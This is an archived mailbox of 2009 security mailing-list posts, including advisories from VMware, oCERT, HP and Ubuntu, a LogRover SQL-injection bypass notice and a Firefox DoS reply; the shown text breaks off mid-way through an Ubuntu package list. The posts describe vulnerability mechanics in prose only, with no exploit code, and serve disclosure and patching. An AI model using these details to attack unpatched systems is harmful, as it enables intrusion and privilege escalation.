                   VMware Security Advisory

Advisory ID:       VMSA-2009-0009
Synopsis:          ESX Service Console updates for udev, sudo, and curl
Issue date:        2009-07-10
Updated on:        2009-07-10 (initial release of advisory)
CVE numbers:       CVE-2009-1185 CVE-2009-0034 CVE-2009-0037
- -----------------------------------------------------------------------

1. Summary

   Update for Service Console packages udev,sudo, and curl

2. Relevant releases

   VMware ESX 4.0.0 without bulletin ESX400-200906411-SG,
   ESX400-200906406-SG, ESX400-200906407-SG.

3. Problem Description

 a. Service Console package udev

    A vulnerability in the udev program did not verify whether a NETLINK
    message originates from kernel space, which allows local users to
    gain privileges by sending a NETLINK message from user space.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-1185 to this issue.

    Please see http://kb.vmware.com/kb/1011786 for details.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  ================    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           any       ESXi     not affected

    ESX            4.0       ESX      ESX400-200906411-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. Service Console package sudo

    Service Console package for sudo has been updated to version
    sudo-1.6.9p17-3. This fixes the following issue: Sudo versions
    1.6.9p17 through 1.6.9p19 do not properly interpret a system group
    in the sudoers file during authorization decisions for a user who
    belongs to that group, which might allow local users to leverage an
    applicable sudoers file and gain root privileges by using a sudo
    command.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-0034 to this issue.

    Please see http://kb.vmware.com/kb/1011781 for more details

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  ================    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           any       ESXi     not affected

    ESX            4.0       ESX      ESX400-200906411-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service Console package curl

    Service Console package for curl has been updated to version
    curl-7.15.5-2.1.  This fixes the following issue: The redirect
    implementation in curl and libcurl 5.11 through 7.19.3, when
    CURLOPT_FOLLOWLOCATION is enabled, accepts arbitrary Location
    values, which might allow remote HTTP servers to trigger arbitrary
    requests to intranet servers, read or overwrite arbitrary files by
    using a redirect to a file: URL, or execute arbitrary commands by
    using a redirect to an scp: URL.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-0037 to this issue.

    Please see http://kb.vmware.com/kb/1011782 for details

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  ================    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           any       ESXi     not affected

    ESX            4.0       ESX      ESX400-200906407-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESX 4.0
   -------
   ESX400-200906001
   http://tinyurl.com/ncfu5s
   md5sum:cab549922f3429b236633c0e81351cde
   sha1sum:aff76554ec5ee3c915eb4eac02e62c131163059a

   Note: ESX400-200906001 contains the following security fixes
         ESX400-200906411-SG, ESX400-200906406-SG, ESX400-200906405-SG,
         ESX400-200906407-SG.

   To install an individual bulletin use esxupdate with the -b option.
   esxupdate --bundle ESX400-200906001.zip -b ESX400-200906411-SG \
   -b ESX400-200906406-SG -b ESX400-200906405-SG -b \
   ESX400-200906407-SG update

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037

- -------------------------------------------------------------------------
6. Change log

2009-07-10  VMSA-2009-0008
Initial security advisory after release of bulletins for ESX 4.0 on
2009-07-10.

- ------------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2009 VMware Inc.  All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iD8DBQFKV9esS2KysvBH1xkRAn2bAJ91HvmEkAxVpRxehax8rGzBd+ufcwCeIhk8
zk/ROHHbZJmWN44MlbMIx/8=fQaI
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c6b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40830-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C83AAEC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 13:40:39 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 441651436FC; Mon, 13 Jul 2009 09:55:50 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10609 invoked from network); 13 Jul 2009 15:14:58 -0000
Date: 13 Jul 2009 15:15:33 -0000
Message-ID: <20090713151533.7116.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: ddivulnalert@ddifrontline.com
To: bugtraq@securityfocus.com
Subject: DDIVRT-2009-26 LogRover SQL Injection Authentication Bypass
Status:   

Title
-----
DDIVRT-2009-26 LogRover SQL Injection Authentication Bypass

Severity
--------
Medium

Date Discovered
---------------
May 12, 2009

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Geoff Humes and r@b13$

Vulnerability Description
-------------------------
The login screen of the LogRover web interface is vulnerable to a SQL Injection which can allow remote attackers to login to the system via an authentication bypass.

Solution Description
--------------------
Limit access to the login page to internal networks and trusted users only.

Tested Systems / Software (with versions)
------------------------------------------
LogRover version 2.3 for Windows XP

Vendor Contact
--------------
Name: LogRover
Website: http://www.logrover.com/

From - Mon Jul 13 18:03:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c6c
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40831-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 41D7FEC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 13:56:29 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 95CB0237466; Mon, 13 Jul 2009 10:44:29 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9419 invoked from network); 13 Jul 2009 14:54:58 -0000
Message-Id: <200907131455.n6DEtf42000999@shiloh.geol.niu.edu>
Date: Mon, 13 Jul 2009 09:55:42 -0500 (CDT)
From: Neil Dickey <neil@geol.niu.edu>
Reply-To: Neil Dickey <neil@geol.niu.edu>
Subject: Re: Update: [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
To: bugtraq@securityfocus.com, Thierry@zoller.lu
X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.3.5 SunOS 5.7 sun4m sparc 
Content-Type: text
X-Sun-Text-Type: ascii
Status:   


>Update:
>-------
>Patch was ineffective,  Length2 was fixed and both
>SVGNumber and SVGNumber2, but no SVGLength.
>
>Affected products :
>- All firefox versions below 3.5

If this bug includes version 3.5, there is a workaround:
Set your cache size to zero until an effective patch is
published.

When this bug kicked in on my copy of Ff3.5 I thought
the hard drive had blown a bearing from the noise it
made.  It hadn't ( whew ), and the workaround has
worked fine.

Best regards,

Neil Dickey, Ph.D.
email: neil@geol.niu.edu
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois, U.S.A.
60115

From - Mon Jul 13 18:03:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c6e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40832-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9CE72EC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 15:10:28 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 69BAC236F65; Mon, 13 Jul 2009 12:59:56 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18762 invoked from network); 13 Jul 2009 18:11:19 -0000
Date: Mon, 13 Jul 2009 19:12:05 +0100
From: Andrea Barisani <lcars@ocert.org>
To: ocert-announce@lists.ocert.org, oss-security@lists.openwall.com,
bugtraq@securityfocus.com
Subject: [oCERT-2009-012] libtiff tools integer overflows
Message-ID: <20090713181205.GU4038@inversepath.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-GPG-Key: 0x864C9B9E
X-GPG-Fingerprint: 0A76 074A 02CD E989 CE7F  AC3F DA47 578E 864C 9B9E
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Status:   


#2009-012 libtiff tools integer overflows

Description:

The libtiff image library tools suffer from integer overflows which may lead to
a potentially exploitable heap overflow and result in arbitrary code execution.

The libtiff package ships a library, for reading and writing TIFF, as well as a
small collection of tools for manipulating TIFF images. The cvt_whole_image
function used in the tiff2rgba tool and the tiffcvt function used in the
rgb2ycbcr tool do not properly validate the width and height of the image.
Specific TIFF images with large width and height can be crafted to trigger the
vulnerability.

A patch has been made available by the maintainer and further improved by Tom
Lane of Red Hat.

Affected version:

libtiff <= 3.8.2, <= 3.9 (stable), <= 4.0 (development)

Fixed version:

libtiff, N/A (patch has been made available and it's expected to be committed
to libtiff CVS)

Credit: vulnerability report and PoC code received from Tielei Wang <wangtielei
        [at] icst [dot] pku [dot] edu [dot] cn>, ICST-ERCIS.

CVE: CVE-2009-2347

Timeline:

2009-05-22: vulnerability report received
2009-05-22: contacted libtiff maintainer
2009-06-30: report resent to maintainer due to lack of response
2009-07-01: maintainer provides patch
2009-07-04: reporter confirm fixes
2009-07-04: oCERT requests one week embargo for vendor notification
2009-07-04: maintainer confirms embargo
2009-07-07: contacted affected vendors
2009-07-07: assigned CVE
2009-07-07: improved patch contributed by Tom Lane of Red Hat
2009-07-04: reporter acknowledges patch
2009-07-13: advisory release

References:
https://bugzilla.redhat.com/attachment.cgi?id5132
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-2347

Permalink:
http://www.ocert.org/advisories/ocert-2009-012.html

-- 
Andrea Barisani |                Founder & Project Coordinator
          oCERT | Open Source Computer Emergency Response Team

<lcars@ocert.org>                         http://www.ocert.org
 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
        "Pluralitas non est ponenda sine necessitate"

From - Mon Jul 13 18:03:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c6f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40833-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2DBDBEC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 15:34:45 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B1EFB237019; Mon, 13 Jul 2009 13:00:16 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19394 invoked from network); 13 Jul 2009 18:48:07 -0000
From: security-alert@hp.com
To: bugtraq@securityfocus.com
Subject: [security bulletin] HPSBGN02446 SSRT090111 rev.1 - HP ProCurve Threat Management Services zl Module (J9155A), Remote Unauthorized Access, Denial of Service (DoS)
Message-Id: <20090713184845.5C99AC034@hpchs.cup.hp.com>
Date: Mon, 13 Jul 2009 11:48:45 -0700 (PDT)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01803910
Version: 1

HPSBGN02446 SSRT090111 rev.1 - HP ProCurve Threat Management Services zl Module (J9155A), Remote Unauthorized Access, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-07-13
Last Updated: 2009-07-13

Potential Security Impact: Remote unauthorized access, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP ProCurve Threat Management Services zl Module (J9155A). These vulnerabilities could be exploited remotely to gain unauthorized access or to create a Denial of Service (DoS).

References: CVE-2009-1422 (PR_41209), CVE-2009-1423 (PR_39898), CVE-2009-1424 (PR_39412), CVE-2009-1425 (PR_18770)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ProCurve Threat Management Services zl Module (J9155A) running vST.1.0.090213 or earlier

BACKGROUND

CVSS 2.0 Base Metrics
==========================================================  Reference              Base Vector             Base Score
CVE-2009-1422    (AV:N/AC:H/Au:N/C:C/I:C/A:N)       7.1    
CVE-2009-1423    (AV:N/AC:H/Au:N/C:N/I:N/A:C)       5.4    
CVE-2009-1424    (AV:N/AC:H/Au:N/C:N/I:N/A:C)       5.4    
CVE-2009-1425    (AV:N/AC:H/Au:N/C:N/I:N/A:C)       5.4    
==========================================================             Information on CVSS is documented             
            in HP Customer Notice: HPSN-2008-002           

RESOLUTION

HP has made the following software update available to resolve the vulnerabilities.

The update is available from http://www.hp.com/rnd/software/network_security.htm

Product
 Version

HP ProCurve Threat Management Services zl Module
 ST.1.0.090603 or subsequent

Note: PR_41209, PR_39898, PR_39412, and PR_18770 are documented in the Release Notes for vST.1.0.090603.

PRODUCT SPECIFIC INFORMATION

None

HISTORY
Version:1 (rev.1) - 13 July 2009 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
    -check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
    -verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (HP-UX)

iEYEARECAAYFAkpbRhEACgkQ4B86/C0qfVl3xgCg7jEzheufkiLM8p1GIyuHszFs
/8IAoL0opXD/2eUOpTzzyT7cZcfmkjhQ
=pOEf
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c71
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40834-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7E329EC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 15:50:21 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2975F236F6F; Mon, 13 Jul 2009 13:41:42 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20847 invoked from network); 13 Jul 2009 19:25:18 -0000
Date: Mon, 13 Jul 2009 14:26:02 -0500
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-800-1] irssi vulnerability
Message-ID: <20090713192602.GB8018@severus.strandboge.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="l76fUT7nc3MelDdI"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--l76fUT7nc3MelDdI
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-800-1              July 13, 2009
irssi vulnerability
CVE-2009-1959
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  irssi                           0.8.10-1ubuntu1.1

Ubuntu 8.04 LTS:
  irssi                           0.8.12-3ubuntu3.1

Ubuntu 8.10:
  irssi                           0.8.12-4ubuntu2.1

Ubuntu 9.04:
  irssi                           0.8.12-6ubuntu1.1

After a standard system upgrade you need to restart irssi to effect the
necessary changes.

Details follow:

It was discovered that irssi did not properly check the length of strings
when processing WALLOPS messages. If a user connected to an IRC network
where an attacker had IRC operator privileges, a remote attacker could
cause a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1.diff.gz
      Size/MD5:   153485 c76b50ee0214ffeade913d27388ccb39
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1.dsc
      Size/MD5:      731 7c627e770089ad47e51cdccaebdfd3ce
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10.orig.tar.gz
      Size/MD5:  1322825 ed29412e86e1d5fbb71d24ae02edd462

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.10-1ubuntu1.1_amd64.deb
      Size/MD5:   253350 b7988fa042ae96a6a3527f9b3c9053b7
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-text_0.8.10-1ubuntu1.1_amd64.deb
      Size/MD5:   205360 233dc6d41a8a0a204d1e8555e992447a
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1_amd64.deb
      Size/MD5:  1120732 43a93b55e0969cb85a7eb25381e5e0ab

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.10-1ubuntu1.1_i386.deb
      Size/MD5:   253356 8bfca7ccf237bedc1543a7cc172ff373
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-text_0.8.10-1ubuntu1.1_i386.deb
      Size/MD5:   205364 639b2df9bf00261a7ed0eff854c45d45
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1_i386.deb
      Size/MD5:  1013086 dbec700906ebd5cef1b3b5f1860af161

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.10-1ubuntu1.1_powerpc.deb
      Size/MD5:   253372 5361bc09986c96efafce34a0c8eb1388
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-text_0.8.10-1ubuntu1.1_powerpc.deb
      Size/MD5:   205364 b48e92135c6ddd6fb6e22feb9c9c72e1
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1_powerpc.deb
      Size/MD5:  1102212 dc4eb9eb69ea479cb8fbdcec5fe653df

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.10-1ubuntu1.1_sparc.deb
      Size/MD5:   253370 6f8fd56bc8b7803cc91adc6a84ace106
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-text_0.8.10-1ubuntu1.1_sparc.deb
      Size/MD5:   205360 30870fc30a164eed42aac19bf2b7a3d1
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.10-1ubuntu1.1_sparc.deb
      Size/MD5:  1055578 7e1309cf46f06c455d396191b6b91ee7

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1.diff.gz
      Size/MD5:    24071 b83bb3674fa5d16307d7ecf9d0b0dc6c
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1.dsc
      Size/MD5:      996 c11231841b15900ded6608d12bb2fbe4
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12.orig.tar.gz
      Size/MD5:  1335967 ddf717a430e1c13a272f528c4f529430

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-3ubuntu3.1_amd64.deb
      Size/MD5:   271182 ac47cd0d048efa348e671c2849c60d86
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1_amd64.deb
      Size/MD5:  1159272 aa2826354fe258af8bda4fd051541b61

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-3ubuntu3.1_i386.deb
      Size/MD5:   271184 6ea6b8816efdabffb8217d80d68d72cb
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1_i386.deb
      Size/MD5:  1076156 0c5c50ee8c9b7e89b7bacd32fc56a5e4

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-3ubuntu3.1_lpia.deb
      Size/MD5:   271178 b2d419141aac13937b8e8c27bf0f0fd7
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1_lpia.deb
      Size/MD5:  1070272 25bb78d0757722146f1e00cf4aa3a1f7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-3ubuntu3.1_powerpc.deb
      Size/MD5:   271200 2aeb20fb432f4d3aa5d8b5e37fb770dc
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1_powerpc.deb
      Size/MD5:  1164908 5a5502d281326f1fbbf1770fd0ff2450

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-3ubuntu3.1_sparc.deb
      Size/MD5:   271194 f2b95ea9a40aeaa5b0d891fe8669281d
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-3ubuntu3.1_sparc.deb
      Size/MD5:  1099954 24ba8949b7d1887d8e14e6a122b0308b

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1.diff.gz
      Size/MD5:    18831 a26887cf62709a33d50b7452b94b0d66
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1.dsc
      Size/MD5:     1390 380dd166817d6636da8068b7d117957f
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12.orig.tar.gz
      Size/MD5:  1335967 ddf717a430e1c13a272f528c4f529430

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-4ubuntu2.1_amd64.deb
      Size/MD5:   272202 f1ad1b74c3d10788fdf1f213c99b67fc
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1_amd64.deb
      Size/MD5:  1164742 7433268f4731e2a7b88acec697df5e27

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-4ubuntu2.1_i386.deb
      Size/MD5:   272214 7187b234b7eab2cd81038d3015b194c0
